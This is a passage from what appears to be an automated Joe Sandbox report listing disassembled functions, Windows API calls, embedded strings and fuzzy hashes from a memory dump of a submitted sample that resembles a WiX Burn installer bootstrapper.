Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

_memcpy_s.LIBCMT ref: 004D4693
_memcpy_s.LIBCMT ref: 004D46A6
_memcpy_s.LIBCMT ref: 004D46C1

Strings

pipe.cpp, xrefs: 004D4672
Failed to allocate memory for message., xrefs: 004D467C
feclient.dll, xrefs: 004D465B, 004D4691

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
API String ID: 886498622-766083570
Opcode ID: d13da52fbf3694f04a3fd20a770c06f31a1872e19e710517824e76e3446d77a8
Instruction ID: 79c5d337abd0405bef8009f360d4d9f847175a55f7eb87364f8236bffb77a190
Opcode Fuzzy Hash: d13da52fbf3694f04a3fd20a770c06f31a1872e19e710517824e76e3446d77a8
Instruction Fuzzy Hash: FC1191B614020AABDB01EE95CC82DEB77ACEF45B14B00452BFA119B241E779EA54C7E4

Function 00503C72 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00503CC0
GetLastError.KERNEL32(?,?,00000000), ref: 00503CCA
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00503CFD

Strings

<, xrefs: 00503CB2
shelutil.cpp, xrefs: 00503CEB
PDv, xrefs: 00503CC0

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$PDv$shelutil.cpp
API String ID: 3023784893-3964616157
Opcode ID: 958d01aa8fc896156c1c24e1906c79889f93eb93e6fe6d585173ff00cf7b478a
Instruction ID: 8f5b2ef3cb1b97009dc0fa17031d4411c72b5d5fd0a8cf39c6772b54238dd588
Opcode Fuzzy Hash: 958d01aa8fc896156c1c24e1906c79889f93eb93e6fe6d585173ff00cf7b478a
Instruction Fuzzy Hash: 6111C775E01229ABDB10DFA9D845A8E7BF8BF08750F104119FD15E7340E7359A049BA4

Function 004C67AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004C67E3
GetLastError.KERNEL32 ref: 004C67ED

Strings

Failed to get temp path., xrefs: 004C681B
variable.cpp, xrefs: 004C6811
4Wu, xrefs: 004C67E3
Failed to set variant value., xrefs: 004C6837

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastPathTemp
String ID: 4Wu$Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 1238063741-1711421887
Opcode ID: 6d0212bd031619928d3a15d55ff2ab89e0edc69fcc26396b4ca5dd5a0c45d65c
Instruction ID: 58e3de02773589cb69252ec3aaf70d497dd7973a19e00dfe9ca16be1291a0986
Opcode Fuzzy Hash: 6d0212bd031619928d3a15d55ff2ab89e0edc69fcc26396b4ca5dd5a0c45d65c
Instruction Fuzzy Hash: FB012B76E4223967D730B7559C06FAE7798AF00710F11416AFD04F72C1EA689D0486F9

Function 005096CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

KERNEL32.DLL, xrefs: 005096E7
AcquireSRWLockExclusive, xrefs: 005096FC
ReleaseSRWLockExclusive, xrefs: 0050970C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: d4fc8b7a42d5ee40d77b52e30683af9ed33fcdf7b91a30b84dbca2a4226ebac9
Instruction ID: 903aaf23cfc2c1ef831692f0e1ec3af5e6c03899be656981f8a37a58516918c5
Opcode Fuzzy Hash: d4fc8b7a42d5ee40d77b52e30683af9ed33fcdf7b91a30b84dbca2a4226ebac9
Instruction Fuzzy Hash: 9501F9726522335BDF300E656CE599F2F84BF133D1310447AE462D31C6DB12C849A690

Function 00500ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,004C5EB2,00000000), ref: 00500AE0
GetProcAddress.KERNEL32(00000000), ref: 00500AE7
GetLastError.KERNEL32(?,?,?,004C5EB2,00000000), ref: 00500AFE

Strings

procutil.cpp, xrefs: 00500B1F
kernel32, xrefs: 00500AD8
IsWow64Process, xrefs: 00500AD1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: 060804a279e43a5a54a93c3d64a3d5f7fcb6c8cfff54df6ca856136bba2287e3
Instruction ID: af43d1594dfc9d2f6d70f0605d04776d20e761d4a87c07069df5328b943982ff
Opcode Fuzzy Hash: 060804a279e43a5a54a93c3d64a3d5f7fcb6c8cfff54df6ca856136bba2287e3
Instruction Fuzzy Hash: ACF0AF72A4023AA7D720AB959C59E9FBFA8BF00B50F414155BD04AB2C0EB70DE0097E0

Function 004D9287 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 004D93C9

Part of subcall function 005056CF: GetLastError.KERNEL32(?,?,004D933A,?,00000003,00000000,?), ref: 005056EE

Strings

Failed to get certificate public key identifier., xrefs: 004D93F7
Failed to find expected public key in certificate chain., xrefs: 004D938A
yTL, xrefs: 004D9287
Failed to read certificate thumbprint., xrefs: 004D93BD
cache.cpp, xrefs: 004D93ED

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp$yTL
API String ID: 1452528299-927785931
Opcode ID: 2c2192ef86ef7580cd64b5ab2aba21eab8e564f288dc498126267e39eec581c3
Instruction ID: f684a01ecf1c3c9c3438b0d09e616194a2ef5324b93606fbfe6f3a1197e39c6d
Opcode Fuzzy Hash: 2c2192ef86ef7580cd64b5ab2aba21eab8e564f288dc498126267e39eec581c3
Instruction Fuzzy Hash: 78414271A00219ABDB10DAA9C855AAFB7B8BB0C714F01416BED05E7391D739ED00CBA8

Function 004D8CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,00000000,00000000), ref: 004D8D18

Strings

Failed to calculate cache path., xrefs: 004D8CD5
per-machine, xrefs: 004D8D69, 004D8DA9
per-user, xrefs: 004D8D72, 004D8D77, 004D8DB2, 004D8DB7
Failed to get old %hs package cache root directory., xrefs: 004D8DB8
Failed to get %hs package cache root directory., xrefs: 004D8D78

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Sleep
String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
API String ID: 3472027048-398165853
Opcode ID: 04c305814b28d7c507f76481f373a88d4fd71869316a8a2081ba7a23373e788a
Instruction ID: c0ab5d0f49de51f1ca0cd6723517533c3a26de524e9ce5bf89c8ec6188e7ef1e
Opcode Fuzzy Hash: 04c305814b28d7c507f76481f373a88d4fd71869316a8a2081ba7a23373e788a
Instruction Fuzzy Hash: B431F472A40215BBEB22AA548C56FBF666DAF20714F11402FFD00B63C1DA7D9D4056A9

Function 004DE956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 004DE985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 004DE994
SetWindowLongW.USER32(?,000000EB,?), ref: 004DE9A8
DefWindowProcW.USER32(?,?,?,?), ref: 004DE9B8
GetWindowLongW.USER32(?,000000EB), ref: 004DE9D2
PostQuitMessage.USER32(00000000), ref: 004DEA31

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: 02d9eefec6f40ab29efb6fec5d1529f6417eab2ce89d7b8c41be57c1e0d7cb1a
Instruction ID: 378471c51086fb2736764ea8db2b15170f840f420eef4fcf344cd14ed1f3b3c8
Opcode Fuzzy Hash: 02d9eefec6f40ab29efb6fec5d1529f6417eab2ce89d7b8c41be57c1e0d7cb1a
Instruction Fuzzy Hash: 2621DE71100105AFDF01AFA9DC68EAE3B66FF54311F10461AFA0A9A3A4C3319D10EB55

Function 004DC7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 004DC811
CloseHandle.KERNEL32(?), ref: 004DC819

Strings

elevation.cpp, xrefs: 004DC9B8
Unexpected elevated message sent to child process, msg: %u, xrefs: 004DC9C4
Failed to save state., xrefs: 004DC891

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: 81555538af33530da9b9d1007dee57d26d1f367a7b60f259c39e423f0e69b418
Instruction ID: 8eedb10b5a9f5d80687f4a8c8d66410d095b0e61860c35c273860b2cc2226b22
Opcode Fuzzy Hash: 81555538af33530da9b9d1007dee57d26d1f367a7b60f259c39e423f0e69b418
Instruction Fuzzy Hash: 6061D77A100515FFCB125F84CD61C55BBB2FF08314711859BFA999A632C736E821EF4A

Function 00507B16 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

SysFreeString.OLEAUT32(00000000), ref: 00507C74
SysFreeString.OLEAUT32(00000000), ref: 00507C7F
SysFreeString.OLEAUT32(00000000), ref: 00507C8A

Strings

`5w, xrefs: 00507C69
atomutil.cpp, xrefs: 00507B49

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `5w$atomutil.cpp
API String ID: 2724874077-1718187286
Opcode ID: 3ed1fa7a25d3b77a8c7a8f3f1cddf95a9654b38893a50b77248136ab0f97d480
Instruction ID: 24526bed11e3cc669ba8e790bb26da51472169250820119b9b2def65ff74b101
Opcode Fuzzy Hash: 3ed1fa7a25d3b77a8c7a8f3f1cddf95a9654b38893a50b77248136ab0f97d480
Instruction Fuzzy Hash: 94518471D0422EAFDB21DF64C948FAEBBB8BF48710F154198E505AB190DB71EE40DBA0

Function 00501217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0050123F
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,004D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00501276
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0050136E

Strings

BundleUpgradeCode, xrefs: 0050121E
regutil.cpp, xrefs: 005012BF

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 07076c2a1b896970a5a0dffdc33cb61f24f2a7ed69ec50d6cbc7c1ad6814fdf3
Instruction ID: 6987890abd52a063c81f7c37b45aee53561b5fb33865089a0017007c33c27e93
Opcode Fuzzy Hash: 07076c2a1b896970a5a0dffdc33cb61f24f2a7ed69ec50d6cbc7c1ad6814fdf3
Instruction Fuzzy Hash: 4341D535A00A1AEFDB219F95C880AFE7BA9BF44714F154569FD01EB680DA309D009BA9

Function 00506357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0050490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,004D8770,00000000,00000000,00000000,00000000,00000000), ref: 00504925
Part of subcall function 0050490D: GetLastError.KERNEL32(?,?,?,004D8770,00000000,00000000,00000000,00000000,00000000), ref: 0050492F

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00505C09,?,?,?,?,?,?,?,00010000,?), ref: 005063C0
WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00505C09,?,?,?,?), ref: 00506412
GetLastError.KERNEL32(?,00505C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00506458
GetLastError.KERNEL32(?,00505C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 0050647E

Strings

dlutil.cpp, xrefs: 005064A2

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLast$Write$Pointer
String ID: dlutil.cpp
API String ID: 133221148-2067379296
Opcode ID: 128aaa8da32276724548937755ac8453223766dad66b7d66715d20d0985252b1
Instruction ID: 1e4fc0c3f99de81fad687efe6a1b068f7ed24864814a8dce753ab9f32d3e0902
Opcode Fuzzy Hash: 128aaa8da32276724548937755ac8453223766dad66b7d66715d20d0985252b1
Instruction Fuzzy Hash: 99415B7290022ABFEF218E94CD85BAE7F69FF04764F154225BD00A61D0E7719D60DAA1

Function 004C2428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000000,004FFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004FFFEF,004E12CF,?,00000000), ref: 004C246E
GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004FFFEF,004E12CF,?,00000000,0000FDE9,?,004E12CF), ref: 004C247A

Part of subcall function 004C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BDB
Part of subcall function 004C3BD3: HeapSize.KERNEL32(00000000,?,004C21CC,000001C7,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3BE2

Strings

strutil.cpp, xrefs: 004C249E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: 08943dbb409ab693a720651236dfb9a8666dfed3b2a7fac455e3f59b1f01c615
Instruction ID: 220852f95d85a0186d2683267bf537f9d79f52b80e6018656483844caa14440f
Opcode Fuzzy Hash: 08943dbb409ab693a720651236dfb9a8666dfed3b2a7fac455e3f59b1f01c615
Instruction Fuzzy Hash: 2531F53820021ABFE7549E658ED4F67339DAB14368B10422FFA119B290E7F99C01966D

Function 004F922B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,004F2444,00000000,00000000,004F3479,?,y4O,?,00000001,004F2444,ECE85006,00000001,004F3479,004F3479), ref: 004F9278
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004F9301
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004F9313
__freea.LIBCMT ref: 004F931C

Part of subcall function 004F521A: HeapAlloc.KERNEL32(00000000,?,?,?,004F1F87,?,0000015D,?,?,?,?,004F33E0,000000FF,00000000,?,?), ref: 004F524C

Strings

y4O, xrefs: 004F923E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID: y4O
API String ID: 573072132-4180157755
Opcode ID: 5401c6e942d4501c194d5e9c0a49c5af44d3f423b2fb0aec2f6a3734b9c4e92f
Instruction ID: 2b756196d3efea8f9b12614ee8405c42f173108158b84a580400204f286b9362
Opcode Fuzzy Hash: 5401c6e942d4501c194d5e9c0a49c5af44d3f423b2fb0aec2f6a3734b9c4e92f
Instruction Fuzzy Hash: C731DC32A0020AABDF249F65CC85EBF7BA5EB44310F05056AFD04D7290EB39CC95CBA4

Function 004EAD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 004EADB3

Strings

Failed to open container: %ls., xrefs: 004EAD85
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 004EAE4A
Failed to extract all payloads from container: %ls, xrefs: 004EADF7
Failed to extract payload: %ls from container: %ls, xrefs: 004EAE3E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CompareString
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 1825529933-3891707333
Opcode ID: d385b6cd43d6f35722c9e9762059738f06ed032dd5fd447a493b9ce48a732add
Instruction ID: fbde685002fff25e3b5793fe8689b406e773e7e6716dc3f186a16cfec3978b71
Opcode Fuzzy Hash: d385b6cd43d6f35722c9e9762059738f06ed032dd5fd447a493b9ce48a732add
Instruction Fuzzy Hash: 4C312632C00156FBCF21AAD5CC86ECF7B69AF04712F104216FD10A7191E739AA65DBE6

Function 00507A10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

SysFreeString.OLEAUT32(00000000), ref: 00507AF4
SysFreeString.OLEAUT32(?), ref: 00507AFF
SysFreeString.OLEAUT32(00000000), ref: 00507B0A

Strings

`5w, xrefs: 00507AE9
atomutil.cpp, xrefs: 00507A3D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `5w$atomutil.cpp
API String ID: 2724874077-1718187286
Opcode ID: e231499c0536afe319e07ff534d9c57c04c73e83e80538013f9087d046e821ce
Instruction ID: 84b5afcd4b2b6575fd77e3abf8a2d1b50963532d366781a67aa3dd891c35221f
Opcode Fuzzy Hash: e231499c0536afe319e07ff534d9c57c04c73e83e80538013f9087d046e821ce
Instruction Fuzzy Hash: D9317232E0552DBBCB12AA95CC45F9EBFA9FF08750F1541A5E901AB190DB70AF009BE0

Function 004CF005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,004D0654,00000001,00000001,00000001,004D0654,00000000), ref: 004CF07D
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,004D0654,00000001,00000001,00000001,004D0654,00000000,00000001,00000000,?,004D0654,00000001), ref: 004CF09A

Strings

Failed to format key for update registration., xrefs: 004CF033
Failed to remove update registration key: %ls, xrefs: 004CF0C7
PackageVersion, xrefs: 004CF05E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
